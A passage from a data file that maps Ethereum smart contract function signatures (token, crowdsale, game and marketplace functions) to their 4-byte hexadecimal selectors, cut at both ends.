"0xe0c4cea8", "WAVEliteToken()": "0xc439af4f", "AICrypto()": "0xcff382ae", "JGCoinOld()": "0xcf662b5e", "oraclizeSetWinner()": "0xe1938b14", "TokenMyUnicoin(uint256,string,string)": "0xa8683df7", "ABOX()": "0x28d8f102", "getVoteAtTxForUser(bytes32,address)": "0x934a029d", "getTxVoteDetails(bytes32)": "0x4d8c3ea6", "getTxs(uint256,uint256)": "0xe970754b", "getPolicyDetailsByHash(bytes32)": "0x417b86fb", "_sender()": "0xcbd49462", "_callReturn(address,bytes,uint256)": "0x3b0a9555", "_generic(bytes,address)": "0x72becdee", "_transferFromToICAPWithReference(address,bytes32,uint256,string,address)": "0xf9a32246", "_transferToICAPWithReference(bytes32,uint256,string,address)": "0x75792f0d", "EternalStorageProxyForStormMultisender(address)": "0x4777dbcf", "upgradeToAndCall(string,address,bytes)": "0x958a41dd", "upgradeTo(string,address)": "0x5a8b1a9f", "OwnedUpgradeabilityProxy(address)": "0x9d38cdbf", "_upgradeTo(string,address)": "0x4345c7c9", "getCleide()": "0xc2de89b7", "setCleide(uint256)": "0x3155625c", "OpenSourceChainToken(address)": "0x56e523e2", "proxyClaimTokens(address)": "0xaeaaaa08", "changeSettings(uint256,uint256,uint256)": "0xa626c089", "DutchAuction(address,uint256,uint256,uint256)": "0x8057e0b0", "setOwner(address,uint256)": "0xab3b87fe", "unlockToken(address,uint256)": "0x31e9e9c0", "updateToken(string,string)": "0xf830c325", "createToken(string,string,address)": "0xafd8fd5f", "unlockTrading()": "0xc2c68ee1", "lockTrading()": "0x86afa110", "tokensByOwner(address)": "0x0d381a28", "verifyUser(string)": "0xe600c817", "isTokenLocked(uint256)": "0x276a28a3", "tokenIdOfUUID(string)": "0x8fa566e8", "ownerOfUUID(string)": "0x95c0954c", "SiuToken()": "0x8a124744", "proxyMergeMint(uint256,bytes32,address[])": "0x593b4530", "GESToken()": "0xb493b0d0", "OpenTransferToken()": "0x2e05177f", "StopTransferToken()": "0x30ee776c", "OpenToken()": "0x853504f3", "sendSecond(address,uint256)": "0xf59e0894", "sendFirst(address,uint256)": "0x092fe5c5", "NLL()": "0x8d05ad4e", "notifySale(uint256,uint256,uint256)": "0x93f33b88", "fitCollectedValueIntoRange(uint256)": "0x3350ae36", "_deleteCompany(bytes32)": "0x5a93f1a1", "_updateCompanies(bytes32[],bytes32[])": "0xee33c5f0", "_updateCompany(bytes32,bytes32)": "0xde658979", "getCompany(bytes32)": "0xca292622", "_createCompanies(bytes32[],bytes32[])": "0x6178ac90", "_createCompany(bytes32,bytes32)": "0xa6d96af6", "setSalary(uint256,uint256,uint256)": "0x5bee29be", "setBoardMember(uint256,uint256,uint256)": "0x6e8de595", "createPinMoTrade(bool,uint256,uint256)": "0x4eb054e6", "PinMoToken()": "0xd9741bd9", "crownIfFreeze(address)": "0xbaa93b56", "_crownUnFreeze(uint256)": "0xf685e618", "_crownFreeze(uint256)": "0xbe71021f", "crownFreeze(address,uint256,uint256)": "0x3d0e6afc", "burnCrown(uint256)": "0x2c78bfdc", "mintCrown(uint256)": "0x6b8b3268", "crownTransfer(address,uint256)": "0x59acbcb1", "crownBalanceOf(address)": "0x0095716b", "PinMoCrown()": "0x7732b322", "getPlayerInventory(address)": "0xe072bd10", "setGuardianRune(uint256,uint256)": "0xa337840c", "setDiscipleItem(uint256,uint256)": "0x85423912", "buyGuardianRune(uint256,uint256,uint256,uint256)": "0x9b13d209", "buyDiscipleItem(uint256,uint256,uint256,uint256)": "0x23b6ce11", "getDiscipleVend(uint256)": "0xa5bd1566", "setDiscipleVend(uint256,uint256)": "0x3f82065b", "acceptDiscipleVend(uint256)": "0xd9dac92c", "offerDiscipleVend(uint256,uint256)": "0xfa5bc660", "vendDisciple(uint256)": "0xac297d21", "getDiscipleSale(uint256)": "0x81c485e7", "setDiscipleSale(uint256,uint256)": "0x3ebdc754", "AcceptDiscipleOffer(uint256)": "0x63b80379", "OfferToDisciple(uint256,uint256)": "0xc01f56d0", "offlineDiscipleSold(uint256,address,uint256)": "0xc45ef547", "buyDisciple(uint256,uint256,uint256)": "0x1dacd8fd", "createDiscipleSale(uint256,uint256,uint256,uint256,uint256)": "0x63bf81cf", "_discipleVendPrice(uint256,uint256)": "0x34615bef", "_generateDiscipleSale(uint256,uint256,uint256,uint256)": "0xb34f7b50", "getGuardianVend(uint256)": "0x72adc407", "setGuardianVend(uint256,uint256)": "0x6218e5cd", "acceptGuardianVend(uint256)": "0xd443fc85", "offerGuardianVend(uint256,uint256)": "0xd947e234", "vendGuardian(uint256)": "0x50ad2f76", "getGuardianSale(uint256)": "0x00d80e07", "setGuardianSale(uint256,uint256)": "0xc9cc0ed5", "AcceptGuardianOffer(uint256)": "0xc68890c7", "OfferToGuardian(uint256,uint256)": "0x2ba8f526", "offlineGuardianSold(uint256,address,uint256)": "0x99b2a233", "buyGuardian(uint256,uint256,uint256)": "0xf6fb2c72", "createGuardianSale(uint256,uint256,uint256,uint256,uint256,uint256)": "0xfe61303b", "_guardianVendPrice(uint256,uint256)": "0xca33a817", "_generateGuardianSale(uint256,uint256,uint256,uint256,uint256)": "0xf58339c1", "getCastleSale(uint256)": "0x0ff3d5ea", "setCastleSale(uint256,uint256)": "0x0bc217d9", "AcceptCastleOffer(uint256)": "0x8343816d", "OfferToCastle(uint256,uint256)": "0x4325f6bb", "OfflineCastleSold(uint256,address,uint256)": "0xa7f32edd", "buyCastle(uint256,uint256,uint256)": "0xf6ab4243", "createCastleSale(uint256,uint256,uint256,uint256,uint256)": "0x6f9b4c1d", "_generateCastleSale(uint256,uint256,uint256,uint256)": "0xb631c8e8", "getRealmSale(uint256)": "0x1838daab", "setRealmSale(uint256,uint256)": "0xc84d56e0", "AcceptRealmOffer(uint256)": "0x6d974ee2", "OfferToRealm(uint256,uint256)": "0xd96db2ec", "offlineRealmSold(uint256,address,uint256)": "0xecdb620d", "buyRealm(uint256,uint256,uint256)": "0x6b12a7bf", "createRealmSale(uint256,uint256,uint256)": "0x3633b1ad", "_generateRealmSale(uint256,uint256)": "0x8f4783f1", "getBrokerAddress(uint256,uint256)": "0x25cb2bc6", "getBrokerInfo(uint256)": "0xcefb09b6", "getBrokerIncoming(address)": "0x67cfdfc9", "transferBroker(address,uint256,uint256)": "0x5db6a31f", "assignSubBroker(uint256,address)": "0xc12b2513", "_brokerFeeDistribute(uint256,uint256,uint256,uint256)": "0x4ab3bbdc", "computePrice(uint256,uint256)": "0xbbd0c939", "_computePrice(uint256,uint256,uint256,uint256)": "0x23e375dd", "setPreSaleDurance(uint256)": "0xdf75f3fb", "setFeeUnit(uint256)": "0x86e49407", "ZYMToken()": "0xd652818d", "BULL()": "0xed7b4753", "Duranium()": "0x3388fa72", "HPCToken(uint256,string,string)": "0x818c2858", "Goldjunge()": "0x2197b236", "KIMEX(address,address)": "0xbb64c09b", "allocateSalesTokens(address,uint256)": "0x2c8c892b", "Extradecoin(address,address)": "0x48bf9179", "TokenVesting(address,address,uint256,uint256,uint256)": "0x02c63852", "vote(string,string,string)": "0x95f59fe1", "propose(string,string,string)": "0xbd51fa4c", "secureTransfer(uint256)": "0x1bacbf4e", "claimInitialAllotment(string,string)": "0xd3f4fcd9", "createInitialAllotment(string,uint256)": "0x3f982b74", "CryptoCongress(address,uint256,uint256)": "0x88c600d0", "REOToken()": "0x6a514db7", "ProofofConcept()": "0xe478b578", "setInflationChange(uint256)": "0x010e3c1c", "setTargetBondingRate(uint256)": "0x77bde142", "Minter(address,uint256,uint256,uint256)": "0xa9036b43", "EthlanceSearchJobs(address)": "0x250de298", "createCampaignAndChannels(address,uint256,string,address[],address[],address[],uint256[],address,string,bytes,uint32[])": "0x581bdd23", "createCampaign(address,uint256,string)": "0x55540004", "CampaignManagerContract(address,address)": "0x0ad7f29f", "getEscrowFullInfo(address)": "0x391efaf2", "getSellerFullInfo(address)": "0x66eec532", "getBuyerFullInfo(address)": "0x99a7b884", "registerEscrow(string,string)": "0xe283d1ec", "registerSeller(string,string)": "0x318fd93d", "registerBuyer(string,string)": "0xb618387a", "EscrowMyEtherEntityDB()": "0xbabf2b2d", "getProjectAddress(string)": "0xe750b5c0", "addProject(string,address)": "0xcc90e725", "hasSigned(address)": "0xbf6a1413", "QuadraticVoting()": "0xa9a11111", "Proof()": "0xde7cb327", "ProofPublicVote()": "0x91e0b6c0", "ProofTeamVote()": "0x80664ba0", "DredgrSwapSolo(bytes5,bytes5,bytes32,bytes32,uint256,bytes32,bytes32,uint256)": "0x8c39bf96", "set(bytes12,bytes32)": "0xa69a5588", "expired(bytes12)": "0x20202965", "expiration(bytes12)": "0xa160bdf5", "timestamp(bytes12)": "0xa99ffb7b", "label(bytes12)": "0xac016a31", "owner(bytes12)": "0x8981d513", "vestingSchedule(address)": "0xffff6b04", "grantVestedTokens(address,uint256,uint256,uint256,uint256,uint256,bool)": "0xc968907f", "addBuyer(address)": "0xbbf89803", "setCustomBuyer(address,uint256)": "0xda14c723", "setBalanceLimit(uint256)": "0x2ce0a6ee", "removeElement(address)": "0x5f2fb08e", "addElement(address,bytes32)": "0x751a0225", "getElement(address)": "0xc8cc9cc2", "Balance(address)": "0x239fcf0f", "buyCredits(address,uint256)": "0xc5efaae8", "giveEther(address,uint256)": "0x0654fbc4", "giveCredits(address,uint256)": "0x463f2c21", "Test2()": "0x218444ab", "createTokenContract(address,uint256)": "0xec98eefc", "Crowdsale(uint256,uint256,uint256,address,uint256)": "0x968b12aa", "kpyGoalReached()": "0xc94a18ba", "startPreICO()": "0xbc40b52a", "KryptopyCrowdsale(uint256,uint256,uint256,uint256,uint256,address)": "0x265f0393", "load(bool,address,address,address,address,address)": "0x779b8dc0", "getWriteTimestamps(bytes32[])": "0x7f94a8fa", "getExists(bytes32[])": "0x37e9ebb5", "canReadInDataObject(address,bytes32[])": "0x1c114b38", "getHashInDataObject(bytes32[])": "0x8350eb5e", "testMathOverloaded()": "0x542bdb4d", "clearTracks()": "0xeb1ea5be", "play(bytes32,address,address)": "0x8458644c", "getTrackByArtist(address,uint256)": "0x4cbc82cd", "artistTrackCount(address)": "0x6d9f4eeb", "getTracksByArtist(address,uint256,uint256)": "0x7f3745db", "trackCount()": "0xab35678c", "getTracks(uint256,uint256)": "0xfdd868df", "Jaak()": "0xb1a82e8f", "SolarEclipseToken()": "0x0811dda0", "withdrawTokens(address[])": "0x5ecb16cd", "Escrow(address,address,address)": "0x3ddcbace", "addAttestation(string,bool,address)": "0xfde1ee44", "changeAddress(address)": "0xfe64d6ff", "Contract(string,string,address)": "0x749db2f6", "getFaucetAmountValue()": "0xf6413e46", "triggerTestEvent()": "0x35fb8e36", "getConstructorString()": "0x239bb5a6", "testSmartContract(string)": "0x3d48c067", "changeFundContract(address)": "0x4f772420", "getVoteHubDetails()": "0x9ab86b78", "getCommunityData(string)": "0x36475668", "getUserData(address,string)": "0xb5a89065", "getUserVotes(address,string,string)": "0xdfeb1fd3", "getKeyVotes(string,string)": "0x45cfcc42", "reclaimTokens(string,string)": "0xc283226d", "vote(string,string,uint256,bool)": "0x61a255b5", "fundDevelopment(string)": "0x705bd32a", "VoteHub(address)": "0x424e94da", "testCreatePrizeUsingNewContract()": "0x2ea38693", "testCreatePricelevelUsingNewContract()": "0x637431ae", "addAttendant(string)": "0xf64820f9", "Workshop()": "0x9d240cf2", "ConstructorTest(uint256,uint256,string,string)": "0xcc5aba27", "getTuple()": "0xd51033db", "setTuple(uint256,uint256,bytes32)": "0xdeb41f8d", "ManagerProxyTargetMockV1(address)": "0x1c0f96bb", "internaltransfer(address,address,uint256)": "0xf279fac5", "queryAirCrash(string)": "0x95b2110a", "AirCrash()": "0x3c630356", "getReadme()": "0x7dcaf720", "TestLib()": "0xf17cc54b", "BenkiICO(address)": "0xe8be73dc", "startICO()": "0x7fa8c158", "changeBaseTokenPrice(uint256)": "0xf19a5810", "fundBTC(address,uint256)": "0x28af792c", "removeAccess(address)": "0x8823da6c", "withdrawFrom(address,address,address[])": "0x7c4edde7", "recycleDividend(uint256)": "0x22c9427e", "feed10(uint256)": "0x24a20a25", "feed1(uint256)": "0xb67cb359", "setTestFee(uint256)": "0x1e841271", "randMod()": "0xa04a59cc", "getBattleKuns(uint256)": "0x2dac17cd", "getKunsNum()": "0x450a03dd", "getKunsByOwner(address)": "0x57cff437", "getKun()": "0x22a993ca", "ETHERKUN()": "0xddbfbdbf", "Anatomia(uint256,uint256)": "0x8546d393", "withdrawRemainingTokens(uint256)": "0x7052dad9", "BuyARXtokens()": "0x6fb93e15", "Setuppackagesale(uint256,uint256)": "0x55347cce", "currentARXtokenSupply()": "0x950b5273", "initialARXtokenSupply()": "0x28d969e2", "ARXPackageSale()": "0x42f39a6f", "SNC()": "0xf4eb20da", "MDIVToken()": "0xac06eb81", "MemeNetworkToken(address,uint256)": "0x6b190ee1", "mintWithLock(address,uint256,uint256,uint256)": "0x67249254", "setNews(string)": "0x884a47b4", "setInfo(string,string,string)": "0x6dec7a93", "releaseTimeOf(address)": "0x286c241a", "checkNotLocked(address,uint256)": "0x021dd82c", "getAccountInformation(uint256)": "0xd4efcfe4", "setSendGodz(uint256)": "0x02cdc1ee", "SaveAccountBuyingGodz(address,uint256)": "0x7eaf45f8", "setHolderInformation(address)": "0x00732113", "GodzSwapGodzEtherCompliance()": "0x3eae396f", "Ellomiun()": "0xcba6582e", "devGiveBlockReward()": "0x3d472d4d", "devChangeMiningReward(uint256)": "0x47a22ca4", "Lima()": "0x003cdf26", "bonus_calculation()": "0x1543d99f", "XmonetaSale()": "0x59d52e2b", "transferTokensFromVault(address,address,uint256)": "0x4d6804c2", "removeSalesAgent()": "0x14b85c1b", "XmonetaToken()": "0x862ed594", "showUser(address)": "0x517fe4de", "switchFeePolicy(bool)": "0x4958abb7", "changeIncreaseStep(uint256)": "0x23133115", "changeDifficultyAndPrice(uint256,uint256)": "0x76ab5ea6", "increasePriceAndDifficulty()": "0x61af1abd", "switchSplitBonusValue(address,bool)": "0x679b948b", "changeUserGroup(address,uint256)": "0xfe60ed81", "addNewGroup(bytes32,uint256,uint256)": "0x31be6a17", "addCoins(uint256)": "0x0173e3f4", "install()": "0x175a0061", "Ur()": "0x9df8f631", "deleteEditor(address)": "0xfb20d98f", "addNewEditor(address)": "0x25a8e6f9", "KeplerTokenExtraSale(uint256,address,address)": "0x8ef25a7a", "SnipCoin()": "0x613a626b", "initializeUsdReceived()": "0x9414d0bf", "initializeEthReceived()": "0x8f038a5a", "initializeSaleWalletAddress()": "0x85e91347", "getAmountByToken(bytes32,string,address)": "0xfc91a274", "getTokenByIndex(bytes32,string,uint256)": "0xc6113205", "getTokenCount(bytes32,string)": "0x5afb540c", "getSolver(bytes32,string)": "0x3959b945", "getSolverAddress(bytes32,string)": "0x99f3379f", "isClaimed(bytes32,string)": "0xbeab3537", "addClaim(address,bytes32,string,string,address,uint256)": "0xdbbd3a71", "isReceiptClaimable(bytes8,bytes8,address[],bytes,bytes32[],uint256[],uint256[],bytes)": "0x86936ed5", "claimHash(bytes32)": "0xf5affc60", "hashClaimable(bytes32)": "0x9d599cbf", "invalidateHash(bytes32)": "0x45af7ceb", "validateHash(bytes32)": "0x3ee3f499", "initValidator(address,address,address)": "0xbf2699e7", "registerImport(bytes8,bytes8,uint256)": "0xf203af26", "registerExport(bytes8,bytes8,uint256)": "0x523934bb", "registerChain(bytes8,uint256)": "0x5561c0e2", "initChainLedger(address,address)": "0x349c870c", "claimReceivables(address[])": "0xfb8b0197", "removeDestinationChain(bytes8)": "0x62016083", "addDestinationChain(bytes8,address)": "0xb27e7244", "setChainLedger(address)": "0x4499af81", "initTokenPorter(address,address)": "0xc554a600", "export(address,bytes8,address,address,uint256,uint256,bytes)": "0xf29b2040", "lockTokenLocker()": "0x27fe75ed", "TokenLocker(address,address)": "0x5032f33b", "restartAuction()": "0x0dd93b56", "auctionStartTime(uint256)": "0x33465c5f", "numTicksTillAuctionStart(uint256)": "0x21d4b08c", "numTicksSinceAuctionStart(uint256)": "0x8f1a927a", "calcPriceAt(uint256)": "0x41a292be", "nextAuctionSupply(uint256)": "0x89d61942", "calcPurchase(uint256,uint256)": "0x218d6ca2", "nextAuction()": "0x6347a377", "whatWouldPurchaseDo(uint256,uint256)": "0x7334a63f", "prepareAuctionForNonOGChain()": "0xd7508a55", "currentMintable()": "0x1d3ce58d", "tokensOnThisChain()": "0x518c0f17", "dailyMintable()": "0x843ad7b5", "globalDailySupply()": "0x2b379218", "globalMetSupply()": "0x22ce61b2", "isInitialAuctionEnded()": "0x1d38bebd", "stopEverything()": "0x4938649a", "mintInitialSupply(uint256[],address,address,address)": "0x0a5f558e", "createTokenLocker(address,address)": "0x40a3a9c7", "getEthOfferAmount(uint256)": "0x5416707c", "getEthOfferPrice(uint256)": "0x9c4abe06", "getEthOfferor(uint256)": "0x4bba863e", "getNumEthOfferors()": "0xa2bc1cd4", "getTknOfferAmount(uint256)": "0x213e609f", "getTknOfferPrice(uint256)": "0x681c2ad0", "getTknOfferor(uint256)": "0x0f45f528", "getNumTknOfferors()": "0x8870155c", "updateEthPrice(uint256)": "0x21370942", "updateTknPrice(uint256)": "0x9a80e52f", "buyEth(uint256)": "0x847dd67c", "buyTkn(uint256)": "0x3c5b7d3f", "_cancelEthOffer(address)": "0x1839a417", "cancelEthOffer()": "0xe4a008a0", "_cancelTknOffer(address)": "0xecb9d6a3", "cancelTknOffer()": "0x6feef2bf", "offerEth(uint256)": "0x8f1fdbb9", "offerTkn(uint256,uint256)": "0x92a2b44b", "SimplePHXExchange()": "0x428f4146", "buyPackWithKitty(uint256)": "0xe927da3f", "buyPackWithETH(bool)": "0xc61c3c4b", "buyFirstPackFromReferral(address,bool)": "0xe018c36c", "isOwedFreeReferralPack(address)": "0x9af4b5c8", "claimFreeReferralPack()": "0x374bfba7", "claimBonusCard()": "0x155f1861", "_attributeSale(address,uint256)": "0x9892977b", "claimWhitelistPack(bool)": "0x4425c0eb", "addAddressesToWhitelist(bool,address[])": "0x0c34f8a5", "addToWhitelistAllocation(bool,address,uint8)": "0x2c511788", "_mintCards(uint32)": "0x8e641963", "modifyNextPremiumSale(uint8,uint256)": "0x2c6e38d0", "startNextPremiumSale()": "0xe22ad518", "addPacksToNextPremiumSale(uint32[])": "0xa0b31d58", "createNextPremiumSale(uint8,uint256)": "0xce4e8c1a", "setStandardPackPrice(uint256)": "0x8328e032", "startStandardSale()": "0xb6c32d71", "addPacksToStandardSale(uint32[])": "0xe3a94e9f", "BitSelectProtegido()": "0x832018aa", "freezeMethod(address,bool)": "0x6e4f749e", "CryptoLandmarks()": "0x0ebf3886", "BLOCKRADIO()": "0x01665393", "setIcoTokenExchangeRate(uint256)": "0x7c3382ae", "setPreSaleTokenExchangeRate(uint256)": "0xb1a06ee7", "checkKhFundDepositAddress()": "0x29893dcf", "checkEthFundDepositAddress()": "0x0c9dc2b8", "checkKwhDeployerAddress()": "0x378e0fc1", "checkEthRaised()": "0x1f45006c", "sendFundHome2()": "0x3c35c88a", "sendFundHome()": "0x370014f2", "KWHToken(address,address,address)": "0x49ae1f17", "transferBuy(address,uint256)": "0x7ce5b85e", "withdrawPUB()": "0xe89b3ecb", "setPubEnd(uint256)": "0x711619de", "setaddrFWD(address)": "0xcd819bdd", "CFNDCrowdsale()": "0x7abf75fd", "initialize(uint256,uint256,uint256)": "0x80d85911", "LemoSale(uint256,uint256,uint256)": "0xb036ab65", "playEtherOf()": "0xc46a6262", "GameSicBo(string,uint256,uint256,uint256)": "0x1f11d503", "getBack2()": "0x5368cc55", "trade(address[],uint256,uint256)": "0x7b568081", "Rafflecoin()": "0xce77cf42", "hariKari()": "0xacdfb350", "getTotalPctx10()": "0x2a0d06ec", "addAccount(address,uint256)": "0xc1ce56eb", "setWitdrawGas(uint256)": "0xc61f13a1", "OrganizeFunds()": "0xe89ac5dd", "GOFCoin(uint256)": "0x76e7b151", "ZebiToken()": "0x1f5623f3", "CUCUX()": "0xe1fbeaed", "setUSDBtc(uint256)": "0x22cacd6b", "getUSDBtc()": "0x5bea05b1", "setUSDEth(uint256)": "0x7a5a35ad", "getUSDEth()": "0x04304b55", "delOwner(address)": "0x73984188", "AviaC01n()": "0xea801802", "OdinCoin(address)": "0xff1401cc", "BudCoin()": "0xf7745f88", "setAd(string,string)": "0xe6b09e92", "ADT()": "0xf93a2109", "ZitKOIN()": "0x3115d2ce", "realDEXToken()": "0xa9d82f18", "LinkyexToken(address,address)": "0xa8929183", "SimpleMarket()": "0x3819ea68", "setFixPrice(uint256)": "0xe18fb814", "changeInSale(bytes32,bytes32,uint256)": "0xc403adc8", "changeOwner(bytes32,bytes32,bytes32,address,string,bytes32,bytes32)": "0xefcb6cde", "deleteUser(bytes32)": "0x5e5d4320", "createProduct(bytes32,string,bytes32,bytes32)": "0x9d1b0fd1", "createUser(bytes32,bytes32)": "0xa91202d3", "getUserProductAtIndex(bytes32,uint256)": "0xd86202cb", "getUserProductCount(bytes32)": "0x0b583982", "isUserProduct(bytes32,bytes32)": "0xb09ac6f2", "isProduct(bytes32)": "0x5f65faf1", "isUser(bytes32)": "0x760bb006", "getProductHistoryPrice(bytes32)": "0x5513a34e", "getProductHistoryDate(bytes32)": "0x5e38c77d", "getProductHistoryUser(bytes32)": "0x46051eb7", "getUserProductsKeys(bytes32)": "0x2d0d9e0f", "getAntsSinceLastCollect(address)": "0xb10477c9", "mintPresaleTokens(address,uint256)": "0x30b2b8aa", "mintFoundingTeamTokens(address,uint256)": "0x33f44026", "mintTreasuryTokens(address,uint256)": "0x8ea83681", "mintEarlySupportersTokens(address,uint256)": "0xfe396c71", "updateUsdPerMEth(uint256)": "0xc1e0e604", "updateBatchStartTime(uint256,uint256)": "0xbbafb379", "getBatchStartTimesLength()": "0x36585cd3", "setBatchNumber(address[],uint256[])": "0xc351fdfd", "setAllocation(address[],uint256[])": "0x3102b21a", "getWhiteListCount()": "0x8f82b8c4", "getBatchNumber(address)": "0x6102c049", "getAllocated(address)": "0x9e59eb14", "addWhiteListed(address[],uint256[],uint256[])": "0x6f147f5c", "PassToken()": "0xa0f72985", "takeInvestments()": "0xcd0643ee", "returnOtherCrypto(address)": "0x880ead7e", "returnEther()": "0xebb6dc3a", "createTokens(address,uint256,uint256)": "0x90cb4854", "buyForInvestor(address,uint256)": "0xca0c74be", "disableTokensTransfer()": "0xbfb68141", "enableTokensTransfer()": "0x73cb8ab7", "setIcoStatus(uint256)": "0xe60aafab", "finishPreIco()": "0x2ea3ad74", "setPreIcoStatus(uint256)": "0x469f4c41", "TESTTESTICO(address,address,address,address)": "0x887b00db", "frostTokens()": "0x4ac6d5f4", "defrostTokens()": "0x8e0ef033", "TESTTESTToken(address)": "0xc74ce765", "MoneyTreeToken()": "0x87873b6d", "frozenOf(address)": "0x1bf6e00d", "T1898Token()": "0x5b7eed81", "TokenResolver()": "0xe585f69f", "setSubnodeOwner(bytes22,address)": "0x95fe5234", "newToken(string,address)": "0x62a80b42", "sendSubscriptionBonus(address)": "0x85c4e3d1", "toRICH(uint256)": "0x6dc585b6", "getInvestorTokenPercentage(address,uint256)": "0xd836b12d", "setBuyBackFund(address)": "0xfd8663d2", "setHumanityFund(address)": "0xc7878fa0", "setMinimumIcoRate(uint256)": "0x2d3ec656", "setCurrentMarketRate(uint256)": "0xc5d953a3", "RICHCrowdsale(address,address,uint256,uint256)": "0x0696eab6", "getPercentageBonusForIco(uint256)": "0xb165a332", "issueAtIco(address,uint256,uint256)": "0x1b2bd803", "grantBurner(address,bool)": "0x567a03a7", "eMTV()": "0xe4e4c8c0", "CFToken()": "0xf84dcb1e", "RankingBallGoldCustomToken(address)": "0xa80f9e2d", "getClaimRate(uint256)": "0xd5ed289d", "claimable(uint256)": "0xd1d58b25", "claimTokenOwnership(address)": "0xe900604d", "POSController(address,uint256,uint256,uint256,uint256)": "0xe89876d6", "transferOwnershipTo(address)": "0x52effe11", "RankingBallGoldToken(address)": "0x535d3f22", "CRYPTODOL()": "0xf25214e4", "KellerWilliams(uint256,uint256)": "0xcb009d2c", "CATSPACE()": "0xada0618a", "setCommissionRate(uint256)": "0x19fac8fd", "sell2(address)": "0xb1057e9c", "startTokensSale(uint256,uint256,uint256,uint256)": "0x9977b698", "mintTokensWithReferal(address,address,uint256)": "0xf95b5e0d", "priceForDate(uint256)": "0x39edb660", "bonusForDate(uint256)": "0x722bd85a", "depositTokens(address,uint256)": "0x66168bd7", "_getTokenIdFromBytes(bytes)": "0x71478fae", "setEthAuction(address)": "0x535c69b6", "ActionAuctionPlat(address,address)": "0xca1b06b2", "onlyOwnerGetCompanyWallet()": "0x4091adf5", "onlyOwnerSetCompanyWallet(address)": "0x8e424f16", "onlyOwnerGetTeamWallet()": "0x34b98747", "onlyOwnerSetTeamWallet(address)": "0x5e76a101", "onlyOwnerGetBountyWallet()": "0x822d9b4e", "onlyOwnerSetBountyWallet(address)": "0xf6f1995d", "onlyOwnerGetAdvWallet()": "0xf7c9afa2", "onlyOwnerSetAdvWallet(address)": "0xba4670da", "RefundableCrowdsale(uint256,uint256)": "0x6a91431e", "_getInStageIndex()": "0x7fe18cf7", "_isInStage(uint256)": "0x9c695a7b", "_getBonus(uint256,uint256)": "0x3449f61c", "getCountStages()": "0xf88bfe3e", "getCurrentStageIndex()": "0xdaa4cf88", "getStageClosingTime(uint256)": "0x2ff98d53", "getStageMinWeiAmount(uint256)": "0x78d22ab0", "getStageAvailableTokens(uint256)": "0x77c626e3", "getStageBonus(uint256)": "0x98faa9a1", "StagebleCrowdsale()": "0xd6938c18", "depositOf(address)": "0x23e3fbd5", "depositAdvisor(address,uint256)": "0x2cd11849", "hasPastFreezTime()": "0x78351502", "Token(uint256,string,string)": "0x6bda3422", "_contractFallback(address,address,uint256,bytes)": "0xb1536051", "buyAtPrice(uint256)": "0x74775cdd", "Irapid()": "0x67845835", "Pay(address)": "0xcde596b2", "ResumePayment()": "0x2654e624", "PausePayment()": "0x37db12c4", "SetMasterWallet(address)": "0xacf372ef", "BitmarkPaymentGateway(address)": "0xab64611b", "Voting(uint8,address,uint256)": "0x8f2abe9a", "convertToMiniRYC(uint256)": "0x5b9a4690", "SellableToken(address,address,address,uint256,uint256,uint256,uint256)": "0x3e99e26a", "sendBountyTokens()": "0x304f8af4", "sendTreasuryTokens()": "0xe6a3afe8", "sendRewardTokens()": "0xf6dcb32c", "sendFounderAndTeamTokens()": "0x8a547932", "burnInvestorTokens(address,address)": "0x23cc16be", "transferAllowed(address,address)": "0x214e52ca", "burnUnusedTokens()": "0xea3015b8", "setBalancesUSD(address,address,uint256)": "0xcdb30482", "setPrivateSale(address)": "0x09f68e96", "setPreICO(address)": "0x7de36138", "Developeo(uint256,string,string,address,address,address,address,address,bool)": "0xbfb7c227", "MintingERC20(uint256,uint256,string,uint8,string,bool,bool)": "0x8e4748cf", "DevelopeoERC20(uint256,string,uint8,string,bool,bool)": "0xb69065d6", "buy(address,address,uint256,bool)": "0xa739013f", "multivestBuy(address,address,string)": "0x5ab7603a", "unsetAllowedMultivest(address,address)": "0xac890c4c", "setAllowedMultivest(address,address)": "0x1ba23f1e", "Multivest(address)": "0x31e7bf9d", "WaykiCoin()": "0xb94fb4a3", "_deleteOffer(uint256)": "0xfb236bba", "_createUnicorn(address)": "0xf9e37733", "_deleteHybridization(uint256)": "0xa139dee2", "UnicornBreeding(address)": "0xc70978da", "geneCore(uint256,uint256,uint256)": "0x1e5d2e41", "createGen0(uint256)": "0x1a9caab9", "BOXICOIN()": "0xe37aca99", "NeobitToken()": "0xfe2cec21", "donateP3D()": "0xd586bd4e", "withdrawAndSend()": "0xd644af34", "WataexToken()": "0xccf82afd", "YOLOCASH()": "0xd3100538", "transferMintership(address)": "0xcf86a95a", "TMXGlobalToken(uint256,uint256,string,string,uint8)": "0xba944118", "transferAndCall(address,uint256,bytes32)": "0xb9570c01", "tokenFallback(address,uint256,bytes32)": "0x8397cc94", "put_transfer(address,address,address,uint256,bool)": "0x92846ab6", "get_balance(address)": "0x1e279a37", "get_allowance(address,address)": "0x18836994", "get_total_supply()": "0xf923058c", "log_approve(address,address,uint256)": "0x88e114cc", "log_transfer(address,address,uint256)": "0xef11e18b", "log_move_fees(address,address,uint256)": "0x55e9caa1", "log_demurrage_fees(address,address,uint256)": "0x79f0b427", "log_recast(address,uint256)": "0x0eebd59b", "log_recast_fees(address,address,uint256)": "0x843584f1", "log_mint(address,uint256)": "0x916635c6", "ETCN(uint256,string,string)": "0x96e6e65f", "TheMark()": "0x715db6ea", "TimeShareEstate()": "0x98b23a29", "serHoldTime(address,address,uint256)": "0x04e6adf8", "setSaleAddress(address)": "0xf8fb491f", "CCCRCoin()": "0xfd05ddfc", "HDTTokenTest()": "0x91603691", "Pomzon()": "0xb8291bda", "getIPFSHash()": "0x20b28ade", "TeamTailsChoice(address)": "0x86849a6c", "TeamChoice(address,uint256)": "0x739e7f48", "sendBet(address,uint256)": "0x2209e991", "JUST()": "0x9954cf22", "THULYA()": "0x768bd5cd", "TBECrowdsale()": "0x2fca3b0d", "createAmountFromTmedForAddress(uint256,address)": "0x65a91d4a", "numRewardsUsed(address)": "0xd7560f2b", "parentAddress(address)": "0xa3b2363d", "setNumRewardsAvailableForAddress(address,address)": "0xf420d9d2", "removeAmountForAddresses(uint256[],address[])": "0x24889e37", "lockGenesisImports()": "0xc66ed8f7", "lockBalanceChanges()": "0x810d54a0", "returnAmountOfTmexAddressCanProduce(address)": "0x2d668da4", "convertToTMEX(uint256,address)": "0x2b086b92", "setTMEXAddress(address)": "0x1d8c61c0", "returnChildAddressForParent(address)": "0xb9afd6e1", "returnIsParentAddress(address)": "0x4e6b29ee", "prohibitFreeze()": "0x9c3c97a1", "setNumRewardsAvailableForAddresses(uint256[],address[])": "0x51175e01", 